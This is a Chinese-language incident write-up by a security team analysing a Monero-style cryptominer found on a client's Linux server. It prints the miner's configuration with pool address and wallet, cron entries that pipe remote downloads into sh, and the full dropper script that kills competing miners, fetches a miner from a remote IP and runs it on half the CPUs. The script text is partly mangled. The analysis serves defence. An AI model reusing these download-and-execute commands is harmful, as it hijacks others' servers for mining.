Linux系统ETN挖矿病毒实例分析
一、背景
近期,客户向华屹安全团队通报其服务器运行异常。经过安全技术人员的检查,发现了这是一例典型的利用Linux服务器漏洞实施XMR挖矿的安全事件。当前网络安全事件中黑客利用系统漏洞实施挖矿的事件频见报道,而本团队在实际工作中却头回遇见,因此对该样本实施了具体分析。
二、技术具体分析
1、主机环境为Linux
2、发现一异常进程,其运行情况为:
./kswapd0 -c ksvjptcyah.cf -t 2
连接的端口是148.251.133.246的80。
利用IP查询,发现其是德国的服务器。具体如下图所示:
ksvjptcyah.cf内容
{
“url” : “stratum+tcp://148.251.133.246:80”,
“user” :”etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc”,
“pass” : “x”,
“algo” : “cryptonight”,
“quiet” : true
}
显然,这是挖矿程序的配置文件。
其中矿池地址为:148.251.133.246:80
挖矿帐号为:etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc
Quiet表示在后台安静的挖矿。
在该矿池的界面,通过搜索发现该帐号挖矿的具体情况如下图所示:
4、利用kill杀掉kswapd0进程。
过一会发现,又出来相同异常进程,进程会变化,
./ Ksvjptcyah -c Ksvjptcyah .cf -t 2。
5、查找其启动方式,根据以往经验,一般病毒会利用定时任务启动。
果然,发现启动任务如下:
*/29 * * * * wget -O – -q/Article/UploadPic/2018-4/2018416184522986.jpg|sh
*/30 * * * * curl/Article/UploadPic/2018-4/2018416184522986.jpg|sh
利用ip138查询,发现181.214.87.241是一台位于美国或者智利的机器。查询结果如下图所示:
oracle.jpg的内容:
id1=”adcixstgtf”
id2=”ksvjptcyah”
id3=”kswapd0″
rm -rf /var/tmp/vmstat
rm -rf /var/tmp/echo $id1
.conf
ps auxf|grep -v grep|grep -v echo$id2
|grep “/tmp/”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “\-px”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep”stratum”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep”cryptonight”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep echo$id1
|awk ‘{print $2}’|xargs kill -9
ps -fe|grep echo $id2
|grep -v grep
if [ $? -ne 0 ]
then
echo “start process…..”
chmod 777 /var/tmp/echo $id2
.cf
rm -rf /var/tmp/echo $id2
.cf
curl -o /var/tmp/echo $id2
.cfhttp://181.214.87.241/java/echo $id3
.cf
wget -O /var/tmp/echo $id2
.cfhttp://181.214.87.241/java/echo $id3
.cf
chmod 777 /var/tmp/echo $id3
rm -rf /var/tmp/echo $id3
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/echo $id3
http://181.214.87.241/java/echo $id3
wget -O /var/tmp/echo $id3
http://181.214.87.241/java/echo $id3
else
curl -o /var/tmp/echo $id3
http://181.214.87.241/java/echo $id3
_an
wget -O /var/tmp/echo $id3
http://181.214.87.241/java/echo $id3
_an
fi
chmod +x /var/tmp/echo $id3
cd /var/tmp
proc=grep -c ^processor /proc/cpuinfo
cores=$((($proc+1)/2))
./echo $id3
-c echo $id2
.cf -t echo$cores
>/dev/null &
else
echo “Running…..”
fi
通过分析该sh脚本,发现该程序首先分析本地机器是否已经存在其他的挖矿软件,如果存在就先杀掉。(当我财路者格杀勿论…)
然后从181.214.87.241服务器下载配置文件和挖矿程序。
黑客还判断其cpu 情况,cores=$((($proc+1)/2))说明黑客只利用了主机一半多的CPU资源用于挖矿,给机器主人留下一点可用的资源(粗心的机器主人没有反应…,你好我也好…)。
6、服务器如何被感染的?
安全技术人员通过对该服务器的再次分析,发现其websphere软件没有补丁,黑客是利用该软件的java 反序列漏洞直接控制本服务器。